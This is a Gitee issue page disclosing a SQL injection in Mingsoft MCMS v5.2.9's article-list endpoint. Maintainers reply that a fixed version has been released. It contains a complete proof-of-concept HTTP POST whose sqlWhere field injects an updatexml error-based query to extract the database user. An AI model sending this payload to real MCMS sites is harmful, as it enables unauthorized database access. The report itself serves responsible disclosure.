4.2K Star 24.8K Fork 7K

GVP铭飞/MCMS

 / 详情

Mingsoft MCMS v5.2.9 前台查询文章列表接口存在SQL注入

已完成
创建于  
2023-12-06 17:19

系统环境
win10
MCms版本
v5.2.9
漏洞截图

输入图片说明

POC:

POST /cms/content/list.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
Pragma: no-cache
token: null
Content-Length: 327
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/ms/cms/content/main.do
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

categoryType=1&sqlWhere=%5b%7b%22action%22%3a%22and%22%2c%22field%22%3a%22updatexml(1%2cconcat(0x7e%2c(SELECT%20%20current_user)%2c0x7e)%2c1)%22%2c%22el%22%3a%22eq%22%2c%22model%22%3a%22contentTitle%22%2c%22name%22%3a%22文章标题%22%2c%22type%22%3a%22input%22%2c%22value%22%3a%22111%22%7d%5d&pageNo=1&pageSize=10

漏洞原理:
参考:Mingsoft MCMS v5.2.9 SQL后台注入

输入图片说明

输入图片说明

评论 (2)

hammery 创建了任务

感谢对开源产品的关注,建议使用最新的版本

感谢对开源的关注与支持,新的版本已经发布请更新体验。

铭飞 任务状态待办的 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
542665 mingsoft 1714360870
Java
1
https://gitee.com/mingSoft/MCMS.git
git@gitee.com:mingSoft/MCMS.git
mingSoft
MCMS
MCMS

搜索帮助

246c6175 1850385 950819b3 1850385